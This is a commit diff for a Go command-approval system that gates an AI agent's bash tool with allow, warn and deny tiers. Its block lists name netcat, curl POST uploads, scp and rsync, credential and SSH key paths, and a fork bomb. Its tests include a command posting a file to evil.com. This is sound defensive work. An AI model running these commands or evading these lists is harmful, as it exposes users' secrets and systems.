Compare commits

...

1 Commits

Author SHA1 Message Date
ParthSareen
233d5c5eda refactor(agent): implement three-tier approval system with warn patterns
- Remove git commands from auto-allowlist
- Add new warn patterns tier for commands requiring explicit approval
- Move network commands and env files from deny to warn
- Add IsWarn() and containsWord() helper functions
- Enhanced git prefix extraction for granular allowlisting
- Move credential path patterns to denyPathPatterns
- UI improvements: dynamic warning messages and allowlist info
- Update tests: add TestIsWarn(), adjust expectations
2026-01-09 00:10:10 -08:00
2 changed files with 267 additions and 52 deletions

View File

@@ -33,7 +33,7 @@ type ApprovalResult struct {
// Option labels for the selector (numbered for quick selection)
var optionLabels = []string{
"1. Execute once",
"2. Always allow",
"2. Allow for this session",
"3. Deny",
}
@@ -70,9 +70,6 @@ var autoAllowCommands = map[string]bool{
// autoAllowPrefixes are command prefixes that are always allowed.
// These are read-only or commonly-needed development commands.
var autoAllowPrefixes = []string{
// Git read-only
"git status", "git log", "git diff", "git branch", "git show",
"git remote -v", "git tag", "git stash list",
// Package managers - run scripts
"npm run", "npm test", "npm start",
"bun run", "bun test",
@@ -91,6 +88,9 @@ var autoAllowPrefixes = []string{
}
// denyPatterns are dangerous command patterns that are always blocked.
// NOTE: Some network patterns (curl POST, scp, rsync) moved to warnPatterns
// to allow user escalation with explicit approval.
// These patterns use word boundary matching to avoid false positives (e.g., "nc " won't match "rsync").
var denyPatterns = []string{
// Destructive commands
"rm -rf", "rm -fr",
@@ -101,19 +101,8 @@ var denyPatterns = []string{
"sudo ", "su ", "doas ",
"chmod 777", "chmod -R 777",
"chown ", "chgrp ",
// Network exfiltration
"curl -d", "curl --data", "curl -X POST", "curl -X PUT",
"wget --post",
// Network tools (raw sockets - still blocked)
"nc ", "netcat ",
"scp ", "rsync ",
// History and credentials
"history",
".bash_history", ".zsh_history",
".ssh/id_rsa", ".ssh/id_dsa", ".ssh/id_ecdsa", ".ssh/id_ed25519",
".ssh/config",
".aws/credentials", ".aws/config",
".gnupg/",
"/etc/shadow", "/etc/passwd",
// Dangerous patterns
":(){ :|:& };:", // fork bomb
"chmod +s", // setuid
@@ -121,11 +110,20 @@ var denyPatterns = []string{
}
// denyPathPatterns are file patterns that should never be accessed.
// These are checked as exact filename matches or path suffixes.
// These are checked using simple substring matching.
var denyPathPatterns = []string{
".env",
".env.local",
".env.production",
// History files
"history",
".bash_history", ".zsh_history",
// SSH keys and config
".ssh/id_rsa", ".ssh/id_dsa", ".ssh/id_ecdsa", ".ssh/id_ed25519",
".ssh/config",
// Cloud credentials
".aws/credentials", ".aws/config",
".gnupg/",
// System credentials
"/etc/shadow", "/etc/passwd",
// Secrets files
"credentials.json",
"secrets.json",
"secrets.yaml",
@@ -134,6 +132,25 @@ var denyPathPatterns = []string{
".key",
}
// warnPatterns are patterns that require explicit approval with warning.
// These are potentially risky but legitimate in some contexts.
// Unlike denyPatterns, these show a warning but allow user approval.
var warnPatterns = []string{
// Network operations (user may need for legitimate API testing)
"curl -d", "curl --data", "curl -X POST", "curl -X PUT",
"wget --post",
// File transfer (user may need for deployments)
"scp ", "rsync ",
}
// warnPathPatterns are file patterns that require explicit approval with warning.
// Unlike denyPathPatterns, these show a warning but allow user approval.
var warnPathPatterns = []string{
".env",
".env.local",
".env.production",
}
// ApprovalManager manages tool execution approvals.
type ApprovalManager struct {
allowlist map[string]bool // exact matches
@@ -176,7 +193,8 @@ func IsDenied(command string) (bool, string) {
// Check deny patterns
for _, pattern := range denyPatterns {
if strings.Contains(commandLower, strings.ToLower(pattern)) {
patternLower := strings.ToLower(pattern)
if containsWord(commandLower, patternLower) {
return true, pattern
}
}
@@ -191,6 +209,57 @@ func IsDenied(command string) (bool, string) {
return false, ""
}
// containsWord checks if a command contains a pattern as a word/command.
// This handles patterns like "nc " which should match "nc -l 8080" but not "rsync -avz".
// The pattern is considered a match if:
// - It appears at the start of the command, OR
// - It's preceded by a space, pipe, semicolon, or other delimiter
func containsWord(command, pattern string) bool {
// Simple contains check first
if !strings.Contains(command, pattern) {
return false
}
// Check if pattern is at the start
if strings.HasPrefix(command, pattern) {
return true
}
// Check if pattern is preceded by a delimiter (space, pipe, semicolon, &, etc.)
delimiters := []string{" ", "|", ";", "&", "(", "`", "$"}
for _, delim := range delimiters {
if strings.Contains(command, delim+pattern) {
return true
}
}
return false
}
// IsWarn checks if a bash command matches warning patterns.
// These are patterns that require explicit user approval with a warning,
// but are not completely blocked like deny patterns.
// Returns true and the matched pattern if it should warn.
func IsWarn(command string) (bool, string) {
commandLower := strings.ToLower(command)
// Check warn patterns
for _, pattern := range warnPatterns {
if strings.Contains(commandLower, strings.ToLower(pattern)) {
return true, pattern
}
}
// Check warn path patterns
for _, pattern := range warnPathPatterns {
if strings.Contains(commandLower, strings.ToLower(pattern)) {
return true, pattern
}
}
return false, ""
}
// FormatDeniedResult returns the tool result message when a command is blocked.
func FormatDeniedResult(command string, pattern string) string {
return fmt.Sprintf("Command blocked: this command matches a dangerous pattern (%s) and cannot be executed. If this command is necessary, please ask the user to run it manually.", pattern)
@@ -198,6 +267,7 @@ func FormatDeniedResult(command string, pattern string) string {
// extractBashPrefix extracts a prefix pattern from a bash command.
// For commands like "cat tools/tools_test.go | head -200", returns "cat:tools/"
// For git commands like "git log x/agent/", returns "git log:x/agent/" (includes subcommand)
// For commands without path args, returns empty string.
// Paths with ".." traversal that escape the base directory return empty string for security.
func extractBashPrefix(command string) string {
@@ -219,12 +289,30 @@ func extractBashPrefix(command string) string {
"less": true, "more": true, "file": true, "wc": true,
"grep": true, "find": true, "tree": true, "stat": true,
"sed": true,
"git": true, // git commands with path args (e.g., git log x/agent/)
}
if !safeCommands[baseCmd] {
return ""
}
// For git commands, extract the subcommand for more granular allowlisting
var subCmd string
if baseCmd == "git" && len(fields) >= 2 {
// Git subcommand is the second field (e.g., "log", "status", "diff")
// Skip options like "-v" - the first non-option argument is the subcommand
for _, arg := range fields[1:] {
if !strings.HasPrefix(arg, "-") {
subCmd = arg
break
}
}
// If no subcommand found (unlikely for git), use empty string
if subCmd == "" {
subCmd = "unknown"
}
}
// Find the first path-like argument (must contain / or \ or start with .)
// First pass: look for clear paths (containing path separators or starting with .)
for _, arg := range fields[1:] {
@@ -236,6 +324,10 @@ func extractBashPrefix(command string) string {
if isNumeric(arg) {
continue
}
// For git, skip the subcommand itself when looking for paths
if baseCmd == "git" && arg == subCmd {
continue
}
// Only process if it looks like a path (contains / or \ or starts with .)
if !strings.Contains(arg, "/") && !strings.Contains(arg, "\\") && !strings.HasPrefix(arg, ".") {
continue
@@ -277,6 +369,13 @@ func extractBashPrefix(command string) string {
dir = path.Dir(cleaned)
}
// Build prefix with subcommand for git, or just baseCmd for others
if baseCmd == "git" {
if dir == "." {
return fmt.Sprintf("git %s:./", subCmd)
}
return fmt.Sprintf("git %s:%s/", subCmd, dir)
}
if dir == "." {
return fmt.Sprintf("%s:./", baseCmd)
}
@@ -284,6 +383,7 @@ func extractBashPrefix(command string) string {
}
// Second pass: if no clear path found, use the first non-flag argument as a filename
// For git, we still allow ./ prefix even without path args (git status, git stash, etc.)
for _, arg := range fields[1:] {
if strings.HasPrefix(arg, "-") {
continue
@@ -291,6 +391,12 @@ func extractBashPrefix(command string) string {
if isNumeric(arg) {
continue
}
// For git, skip the subcommand when checking for path args
if baseCmd == "git" && arg == subCmd {
// Git commands without path args (git status, git stash, etc.)
// Still return a prefix with subcommand and current directory
return fmt.Sprintf("git %s:./", subCmd)
}
// Treat as filename in current dir
return fmt.Sprintf("%s:./", baseCmd)
}
@@ -494,16 +600,45 @@ func (a *ApprovalManager) RequestApproval(toolName string, args map[string]any)
// This prevents buffered input from causing double-press issues
flushStdin(fd)
// Check if bash command targets paths outside cwd
// Check if bash command should show warning
// Warning is shown for: commands outside cwd, or commands matching warn patterns
isWarning := false
var warningMsg string
var allowlistInfo string
if toolName == "bash" {
if cmd, ok := args["command"].(string); ok {
isWarning = isCommandOutsideCwd(cmd)
// Check for outside cwd warning
if isCommandOutsideCwd(cmd) {
isWarning = true
warningMsg = "command targets paths outside project"
}
// Check for warn patterns (curl POST, scp, rsync, .env files)
if warned, pattern := IsWarn(cmd); warned {
isWarning = true
warningMsg = fmt.Sprintf("matches warning pattern: %s", pattern)
}
// Generate allowlist info for display
prefix := extractBashPrefix(cmd)
if prefix != "" {
// Parse prefix format "cmd:path/" into command and directory
colonIdx := strings.Index(prefix, ":")
if colonIdx != -1 {
cmdName := prefix[:colonIdx]
dirPath := prefix[colonIdx+1:]
// Include "(includes subdirs)" for directories that allow hierarchical matching
// ./ is special - it only allows files in current dir, not subdirs
if dirPath != "./" {
allowlistInfo = fmt.Sprintf("Allow for this session: %s in %s directory (includes subdirs)", cmdName, dirPath)
} else {
allowlistInfo = fmt.Sprintf("Allow for this session: %s in %s directory", cmdName, dirPath)
}
}
}
}
}
// Run interactive selector
selected, denyReason, err := runSelector(fd, oldState, toolDisplay, isWarning)
selected, denyReason, err := runSelector(fd, oldState, toolDisplay, isWarning, warningMsg, allowlistInfo)
if err != nil {
term.Restore(fd, oldState)
return ApprovalResult{Decision: ApprovalDeny}, err
@@ -567,24 +702,28 @@ func formatToolDisplay(toolName string, args map[string]any) string {
// selectorState holds the state for the interactive selector
type selectorState struct {
toolDisplay string
selected int
totalLines int
termWidth int
termHeight int
boxWidth int
innerWidth int
denyReason string // deny reason (always visible in box)
isWarning bool // true if command targets paths outside cwd (red box)
toolDisplay string
selected int
totalLines int
termWidth int
termHeight int
boxWidth int
innerWidth int
denyReason string // deny reason (always visible in box)
isWarning bool // true if command has warning
warningMessage string // dynamic warning message to display
allowlistInfo string // show what will be allowlisted (for "Always allow" option)
}
// runSelector runs the interactive selector and returns the selected index and optional deny reason.
// If isWarning is true, the box is rendered in red to indicate the command targets paths outside cwd.
func runSelector(fd int, oldState *term.State, toolDisplay string, isWarning bool) (int, string, error) {
func runSelector(fd int, oldState *term.State, toolDisplay string, isWarning bool, warningMessage string, allowlistInfo string) (int, string, error) {
state := &selectorState{
toolDisplay: toolDisplay,
selected: 0,
isWarning: isWarning,
toolDisplay: toolDisplay,
selected: 0,
isWarning: isWarning,
warningMessage: warningMessage,
allowlistInfo: allowlistInfo,
}
// Get terminal size
@@ -771,7 +910,11 @@ func renderSelectorBox(state *selectorState) {
// Draw warning line if needed
if state.isWarning {
fmt.Fprintf(os.Stderr, "\033[1mwarning:\033[0m command targets paths outside project\033[K\r\n")
if state.warningMessage != "" {
fmt.Fprintf(os.Stderr, "\033[1mwarning:\033[0m %s\033[K\r\n", state.warningMessage)
} else {
fmt.Fprintf(os.Stderr, "\033[1mwarning:\033[0m command targets paths outside project\033[K\r\n")
}
fmt.Fprintf(os.Stderr, "\033[K\r\n") // blank line after warning
}
@@ -787,17 +930,26 @@ func renderSelectorBox(state *selectorState) {
for i, label := range optionLabels {
if i == 2 { // Deny option with input
denyLabel := "3. Deny: "
// Show placeholder if empty, actual input if typing
inputDisplay := state.denyReason
if inputDisplay == "" {
inputDisplay = "\033[90m(optional reason)\033[0m"
}
if i == state.selected {
fmt.Fprintf(os.Stderr, " \033[1m%s\033[0m%s\033[K\r\n", denyLabel, inputDisplay)
} else {
fmt.Fprintf(os.Stderr, " \033[37m%s\033[0m%s\033[K\r\n", denyLabel, inputDisplay)
}
} else {
// Show allowlist info beside "Allow for this session" (index 1)
displayLabel := label
if i == 1 && state.allowlistInfo != "" {
displayLabel = fmt.Sprintf("%s \033[90m%s\033[0m", label, state.allowlistInfo)
}
if i == state.selected {
fmt.Fprintf(os.Stderr, " \033[1m%s\033[0m\033[K\r\n", label)
fmt.Fprintf(os.Stderr, " \033[1m%s\033[0m\033[K\r\n", displayLabel)
} else {
fmt.Fprintf(os.Stderr, " \033[37m%s\033[0m\033[K\r\n", label)
fmt.Fprintf(os.Stderr, " \033[37m%s\033[0m\033[K\r\n", displayLabel)
}
}
}
@@ -830,16 +982,24 @@ func updateSelectorOptions(state *selectorState) {
if i == 2 { // Deny option
denyLabel := "3. Deny: "
inputDisplay := state.denyReason
if inputDisplay == "" {
inputDisplay = "\033[90m(optional reason)\033[0m"
}
if i == state.selected {
fmt.Fprintf(os.Stderr, " \033[1m%s\033[0m%s\033[K\r\n", denyLabel, inputDisplay)
} else {
fmt.Fprintf(os.Stderr, " \033[37m%s\033[0m%s\033[K\r\n", denyLabel, inputDisplay)
}
} else {
// Show allowlist info beside "Allow for this session" (index 1)
displayLabel := label
if i == 1 && state.allowlistInfo != "" {
displayLabel = fmt.Sprintf("%s \033[90m%s\033[0m", label, state.allowlistInfo)
}
if i == state.selected {
fmt.Fprintf(os.Stderr, " \033[1m%s\033[0m\033[K\r\n", label)
fmt.Fprintf(os.Stderr, " \033[1m%s\033[0m\033[K\r\n", displayLabel)
} else {
fmt.Fprintf(os.Stderr, " \033[37m%s\033[0m\033[K\r\n", label)
fmt.Fprintf(os.Stderr, " \033[37m%s\033[0m\033[K\r\n", displayLabel)
}
}
}
@@ -868,6 +1028,9 @@ func updateReasonInput(state *selectorState) {
// Redraw Deny line with reason
denyLabel := "3. Deny: "
inputDisplay := state.denyReason
if inputDisplay == "" {
inputDisplay = "\033[90m(optional reason)\033[0m"
}
if state.selected == 2 {
fmt.Fprintf(os.Stderr, " \033[1m%s\033[0m%s\033[K\r\n", denyLabel, inputDisplay)
} else {
@@ -901,7 +1064,7 @@ func (a *ApprovalManager) fallbackApproval(toolDisplay string) (ApprovalResult,
fmt.Fprintln(os.Stderr)
fmt.Fprintln(os.Stderr, toolDisplay)
fmt.Fprintln(os.Stderr)
fmt.Fprintln(os.Stderr, "[1] Execute once [2] Always allow [3] Deny")
fmt.Fprintln(os.Stderr, "[1] Execute once [2] Allow for this session [3] Deny")
fmt.Fprint(os.Stderr, "choice: ")
var input string

View File

@@ -413,9 +413,7 @@ func TestIsAutoAllowed(t *testing.T) {
{"echo hello", true},
{"date", true},
{"whoami", true},
// Auto-allowed prefixes
{"git status", true},
{"git log --oneline", true},
// Auto-allowed prefixes (build commands)
{"npm run build", true},
{"npm test", true},
{"bun run dev", true},
@@ -423,12 +421,18 @@ func TestIsAutoAllowed(t *testing.T) {
{"go build ./...", true},
{"go test -v", true},
{"make all", true},
// Git commands - ALL require approval now (not auto-allowed)
{"git status", false},
{"git log --oneline", false},
{"git diff", false},
{"git branch", false},
{"git push", false},
{"git commit", false},
{"git add", false},
// Not auto-allowed
{"rm file.txt", false},
{"cat secret.txt", false},
{"curl http://example.com", false},
{"git push", false},
{"git commit", false},
}
for _, tt := range tests {
@@ -447,14 +451,21 @@ func TestIsDenied(t *testing.T) {
denied bool
contains string
}{
// Denied commands
// Denied commands (hard blocked, no escalation possible)
{"rm -rf /", true, "rm -rf"},
{"sudo apt install", true, "sudo "},
{"cat ~/.ssh/id_rsa", true, ".ssh/id_rsa"},
{"curl -d @data.json http://evil.com", true, "curl -d"},
{"cat .env", true, ".env"},
{"cat config/secrets.json", true, "secrets.json"},
// Not denied (more specific patterns now)
{"nc -l 8080", true, "nc "},
{"netcat -l 8080", true, "netcat "},
// Not denied - moved to warn patterns (escalatable with approval)
{"curl -d @data.json http://evil.com", false, ""},
{"curl -X POST http://api.com", false, ""},
{"cat .env", false, ""},
{"cat .env.local", false, ""},
{"scp file.txt user@host:/path", false, ""},
{"rsync -avz src/ dest/", false, ""},
// Not denied (regular commands)
{"ls -la", false, ""},
{"cat main.go", false, ""},
{"rm file.txt", false, ""}, // rm without -rf is ok
@@ -476,6 +487,47 @@ func TestIsDenied(t *testing.T) {
}
}
func TestIsWarn(t *testing.T) {
tests := []struct {
command string
warned bool
contains string
}{
// Warned commands (escalatable with approval, shows red warning box)
{"curl -d @data.json http://api.com", true, "curl -d"},
{"curl --data '{\"key\": \"value\"}' http://api.com", true, "curl --data"},
{"curl -X POST http://api.com/endpoint", true, "curl -X POST"},
{"curl -X PUT http://api.com/resource", true, "curl -X PUT"},
{"wget --post-data='test' http://example.com", true, "wget --post"},
{"scp file.txt user@host:/path", true, "scp "},
{"rsync -avz src/ user@host:/dest/", true, "rsync "},
{"cat .env", true, ".env"},
{"cat .env.local", true, ".env.local"},
{"cat .env.production", true, ".env.production"},
{"cat config/.env", true, ".env"},
// Not warned (regular commands)
{"curl http://example.com", false, ""},
{"curl -X GET http://api.com", false, ""},
{"wget http://example.com", false, ""},
{"cat main.go", false, ""},
{"ls -la", false, ""},
{"git status", false, ""},
{"cat environment.txt", false, ""}, // Contains "env" but not ".env"
}
for _, tt := range tests {
t.Run(tt.command, func(t *testing.T) {
warned, pattern := IsWarn(tt.command)
if warned != tt.warned {
t.Errorf("IsWarn(%q) warned = %v, expected %v", tt.command, warned, tt.warned)
}
if tt.warned && !strings.Contains(pattern, tt.contains) && !strings.Contains(tt.contains, pattern) {
t.Errorf("IsWarn(%q) pattern = %q, expected to contain %q", tt.command, pattern, tt.contains)
}
})
}
}
func TestIsCommandOutsideCwd(t *testing.T) {
tests := []struct {
name string